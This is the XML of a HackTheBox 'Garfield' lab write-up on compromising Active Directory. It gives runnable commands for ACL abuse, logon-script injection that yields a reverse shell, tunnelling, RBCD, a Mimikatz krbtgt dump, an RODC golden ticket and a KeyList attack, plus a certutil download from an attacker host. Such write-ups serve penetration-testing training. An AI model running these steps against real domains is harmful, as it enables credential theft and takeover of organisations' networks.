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color w:val="9FEF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">GARFIELD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory — Hard | Penetration Test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3A3A3A"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Target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10.129.16.120 (DC01.garfield.htb)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garfield.htb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Windows Server 2019 (Build 17763)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Difficulty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April 10,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Initial Creds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j.arbuckle / Th1sD4mnC4t!@1978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Admin — root flag obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Full Attack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Recon nmap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 2179 (Hyper-V) reveals internal RODC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BloodHound / LDAP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j.arbuckle has WriteDacl + WriteProperty on l.wilson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scriptPath Injection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Malicious logon script → reverse shell as l.wilson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Reset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l.wilson_adm reset via LDAP → WinRM → user.txt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RODC Admin Group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l.wilson_adm added to RODC Administrators group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Ligolo-ng Tunnel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Tunnel to internal network 192.168.100.0/24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RBCD on RODC01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addcomputer FAKE$ + S4U2Proxy → cifs/RODC01 ticket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on RODC01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psexec/wmiexec with RBCD ticket → NT AUTHORITY\SYSTEM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Dump krbtgt_8245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Mimikatz on RODC01 → AES256 key of RODC krbtgt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PRP Modification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msDS-NeverRevealGroup cleared, Administrator added to RevealOnDemand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RODC Golden Ticket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Rubeus golden /rodcNumber:8245 → forged TGT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KeyList Attack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Rubeus asktgs /keyList → Administrator NT hash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DCSync + Root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secretsdump → all hashes → evil-winrm → root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The first step is always enumeration of the attack surface. Nmap reveals exposed services and port 2179 (Hyper-V vmrdp) signals the existence of internal VMs — this is where RODC01 is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echo '10.129.16.120 DC01.garfield.htb garfield.htb' | sudo tee -a /etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">echo '192.168.100.2 RODC01.garfield.htb RODC01' | sudo tee -a /etc/hosts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nmap -sC -sV -p- --min-rate 5000 10.129.16.120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garfield.htb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Kerberos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authentication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MSRPC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139/445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sharing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389/636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LDAP/S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Directory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3389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Desktop</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5985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WinRM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Remote shell (used for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Signals internal VMs — RODC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. BloodHound — ACL Abuse &amp; scriptPath Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With initial credentials j.arbuckle:Th1sD4mnC4t!@1978, BloodHound reveals that j.arbuckle has WriteDacl and WriteProperty on l.wilson's account, including the scriptPath attribute — the path of the logon script executed at user login. By injecting a malicious script on SYSVOL and pointing scriptPath toward it, a shell as l.wilson is obtained on their next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bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb -ns 10.129.16.120 -c all</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Add GenericAll on l.wilson via bloodyAD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --host 10.129.16.120 add genericAll l.wilson j.arbuckle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Upload reverse shell script to SYSVOL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">smbclient //10.129.16.120/SYSVOL -U 'garfield.htb\j.arbuckle%Th1sD4mnC4t!@1978'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># put evil.bat \garfield.htb\scripts\evil.bat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Point l.wilson's scriptPath to the malicious script</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --host 10.129.16.120 set object l.wilson scriptPath --value '\\garfield.htb\SYSVOL\garfield.htb\scripts\evil.bat'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Start listener</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp 4444</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wait for l.wilson to log in → shell received</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lateral Movement — Password Reset &amp; WinRM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From the shell as l.wilson, the account has password reset permissions on l.wilson_adm. Reset the password and obtain a privileged WinRM shell to capture user.txt.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Reset l.wilson_adm password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">net user l.wilson_adm 'WhoKnows123!' /domain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evil-winrm -i 10.129.16.120 -u l.wilson_adm -p 'WhoKnows123!'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">type C:\Users\l.wilson\Desktop\user.txt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Add to RODC Administrators</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Add-ADGroupMember -Identity 'RODC Administrators' -Members l.wilson_adm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Pivot — Ligolo-ng Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RODC01 is on the internal network 192.168.100.0/24, not directly reachable. Ligolo-ng creates a transparent tunnel through the evil-winrm session on DC01.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On Kali — start proxy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo ligolo-proxy -selfcert -laddr 0.0.0.0:11601 -api-laddr 127.0.0.1:8081</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo ip route add 192.168.100.0/24 dev ligolo</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On DC01 (evil-winrm) — upload and run agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.\agent.exe -connect &lt;KALI_IP&gt;:11601 -ignore-cert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In Ligolo console:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">session</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">tunnel_start --tun ligolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. RBCD — SYSTEM on RODC01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With tunnel access, Resource-Based Constrained Delegation (RBCD) is exploited to obtain a cifs/RODC01 ticket impersonating Administrator, then psexec/wmiexec is used to obtain NT AUTHORITY\SYSTEM on RODC01.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1. Create fake computer account</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">impacket-addcomputer garfield.htb/l.wilson_adm:'WhoKnows123!' -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' -dc-ip 10.129.16.120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2. Set RBCD on RODC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-ADComputer RODC01 -PrincipalsAllowedToDelegateToAccount FAKEMACHINE$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3. Request S4U2Proxy ticket impersonating Administrator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">faketime '...' impacket-getST garfield.htb/'FAKEMACHINE$':'FakePass123!' -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip 10.129.16.120</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4. Execute as SYSTEM on RODC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">KRB5CCNAME=Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache faketime '...' impacket-psexec -k -no-pass garfield.htb/Administrator@RODC01.garfield.htb -dc-ip 10.129.16.120</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7. RODC Golden Ticket + KeyList Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The core of the machine: every RODC has its own krbtgt account (krbtgt_8245) with an independent AES256 key. By forging a Golden Ticket signed with this key and including the correct rodcNumber (8245) in the kvno field, a KeyList Request can be sent to the main DC. If Administrator is in the replication allowlist, DC01 returns its real credentials in the TGS-REP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisites — Modify RODC Password Replication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From evil-winrm as l.wilson_adm on DC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-ADComputer RODC01 -Clear msDS-NeverRevealGroup</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Set-DomainObject -Identity RODC01$ -Set @{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  'msDS-RevealOnDemandGroup'=@(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=htb',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    'CN=Administrator,CN=Users,DC=garfield,DC=htb'</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Dump AES256 key of krbtgt_8245 with Mimikatz on RODC01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From SYSTEM shell on RODC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">mimikatz.exe "lsadump::lsa /patch" exit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># or</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt_8245" exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Forge RODC Golden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Download Rubeus on DC01</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">certutil -urlcache -split -f http://&lt;KALI_IP&gt;:8888/Rubeus.exe C:\Windows\Temp\Rubeus.exe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Forge Golden Ticket</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\Temp\Rubeus.exe golden `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /rodcNumber:8245 `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /flags:forwardable,renewable,enc_pa_rep `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /nowrap `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /outfile:C:\Windows\Temp\ticket.kirbi `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /user:Administrator /id:500 `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /domain:garfield.htb `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /sid:S-1-5-21-2502726253-3859040611-225969357</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — KeyList Attack → Administrator NT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C:\Windows\Temp\Rubeus.exe asktgs `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /enctype:aes256 /keyList `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /service:krbtgt/garfield.htb `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /dc:DC01.garfield.htb `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /ticket:C:\Windows\Temp\ticket_*_Administrator_to_krbtgt@GARFIELD.HTB.kirbi `</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  /nowrap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
